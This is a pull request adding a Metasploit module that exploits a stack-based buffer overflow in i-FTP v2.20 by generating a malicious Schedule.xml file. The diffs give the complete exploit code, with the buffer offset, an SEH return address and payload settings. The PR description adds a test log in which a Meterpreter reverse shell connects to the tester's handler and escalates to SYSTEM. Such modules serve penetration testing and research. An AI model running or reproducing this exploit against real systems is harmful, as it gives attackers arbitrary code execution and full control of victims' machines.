### PR TITLE
Add module for i-FTP (OSVDB-114279)

### DIFF
--- a/modules/exploits/windows/fileformat/iftp_schedule_bof.rb
+++ b/modules/exploits/windows/fileformat/iftp_schedule_bof.rb
@@ -1,0 +1,83 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'i-FTP Schedule Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a stack-based buffer overflow vulnerability in
+        i-Ftp v2.20, caused by a long time value set for scheduled download.
+        By persuading the victim to load a specially-crafted Schedule.xml file,
+        a remote attacker could execute arbitrary code on the system or cause
+        the application to crash. This module has been tested successfully on
+        Windows XP SP3.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'metacom',      # Vulnerability discovery and PoC
+          'Gabor Seljan'  # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '35177' ],
+          [ 'OSVDB', '114279' ],
+        ],
+      'DefaultOptions' =>
+        {
+          'ExitFunction' => 'process'
+        },
+      'Platform'       => 'win',
+      'Payload'        =>
+        {
+          'BadChars'   => "\x00\x0a\x0d\x20\x22",
+          'Space'      => 2000
+        },
+      'Targets'        =>
+        [
+          [ 'Windows XP SP3',
+            {
+              'Offset' => 600,
+              'Ret'    => 0x1001eade  # POP ECX # POP ECX # RET [Lgi.dll]
+            }
+          ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Nov 06 2014',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('FILENAME', [ false, 'The file name.', 'Schedule.xml'])
+        ],
+      self.class)
+
+  end
+
+  def exploit
+
+    evil =  rand_text_alpha(target['Offset'])
+    evil << generate_seh_payload(target.ret)
+    evil << rand_text_alpha(20000)
+
+    sploit = "<?xml version=\"1.0\" encoding=\"UTF-8\" ?>
+    <Schedule>
+      <Event Url=\"\" Time=\"#{evil}\" Folder=\"\" />
+    </Schedule>"
+
+    # Create the file
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+    file_create(sploit)
+
+  end
+end

--- a/modules/exploits/windows/fileformat/iftp_schedule_bof.rb
+++ b/modules/exploits/windows/fileformat/iftp_schedule_bof.rb
@@ -17,10 +17,10 @@ class Metasploit3 < Msf::Exploit::Remote
       'Description'    => %q{
           This module exploits a stack-based buffer overflow vulnerability in
         i-Ftp v2.20, caused by a long time value set for scheduled download.
-        By persuading the victim to load a specially-crafted Schedule.xml file,
-        a remote attacker could execute arbitrary code on the system or cause
-        the application to crash. This module has been tested successfully on
-        Windows XP SP3.
+        By persuading the victim to place a specially-crafted Schedule.xml file
+        in the i-FTP folder, a remote attacker could execute arbitrary code on
+        the system or cause the application to crash. This module has been
+        tested successfully on Windows XP SP3.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>

--- a/modules/exploits/windows/fileformat/iftp_schedule_bof.rb
+++ b/modules/exploits/windows/fileformat/iftp_schedule_bof.rb
@@ -4,12 +4,14 @@
 ##
 
 require 'msf/core'
+require 'rexml/document'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::FILEFORMAT
   include Msf::Exploit::Remote::Seh
+  include REXML
 
   def initialize(info = {})
     super(update_info(info,
@@ -70,10 +72,20 @@ class Metasploit3 < Msf::Exploit::Remote
     evil << generate_seh_payload(target.ret)
     evil << rand_text_alpha(20000)
 
-    sploit = %Q|<?xml version="1.0" encoding="UTF-8" ?>
-    <Schedule>
-      <Event Url="" Time="#{evil}" Folder="" />
-    </Schedule>|
+    xml = Document.new
+    xml << XMLDecl.new('1.0', 'UTF-8')
+    xml.add_element('Schedule', {})
+    xml.elements[1].add_element(
+      'Event',
+      {
+        'Url' => '',
+        'Time' => 'EVIL',
+        'Folder' => ''
+      })
+
+    sploit = ''
+    xml.write(sploit, 2)
+    sploit = sploit.gsub(/EVIL/, evil)
 
     # Create the file
     print_status("Creating '#{datastore['FILENAME']}' file ...")

--- a/modules/exploits/windows/fileformat/iftp_schedule_bof.rb
+++ b/modules/exploits/windows/fileformat/iftp_schedule_bof.rb
@@ -70,10 +70,10 @@ class Metasploit3 < Msf::Exploit::Remote
     evil << generate_seh_payload(target.ret)
     evil << rand_text_alpha(20000)
 
-    sploit = "<?xml version=\"1.0\" encoding=\"UTF-8\" ?>
+    sploit = %Q|<?xml version="1.0" encoding="UTF-8" ?>
     <Schedule>
-      <Event Url=\"\" Time=\"#{evil}\" Folder=\"\" />
-    </Schedule>"
+      <Event Url="" Time="#{evil}" Folder="" />
+    </Schedule>|
 
     # Create the file
     print_status("Creating '#{datastore['FILENAME']}' file ...")


### PR DESCRIPTION
This is an MSF port of http://www.exploit-db.com/exploits/35177.
# Verification steps
- [x] Copy Schedule.xml to C:\Program Files\Memecode\i.Ftp
- [x] Start the application

Tested on Windows XP SP3, test run results below:

```
msf > use exploit/windows/fileformat/iftp_schedule_bof
msf exploit(iftp_schedule_bof) > run

[*] Creating 'Schedule.xml' file ...
[+] Schedule.xml stored at /home/gabor/.msf4/local/Schedule.xml
msf exploit(iftp_schedule_bof) > use exploit/multi/handler 
msf exploit(handler) > run

[*] Started reverse handler on 192.168.17.131:4444 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.17.129
[*] Meterpreter session 1 opened (192.168.17.131:4444 -> 192.168.17.129:1063) at 2014-12-21 16:15:28 +0100

meterpreter > getsystem
...got system (via technique 1).
meterpreter > sysinfo
Computer        : GABOR-03722ADE8
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >
```
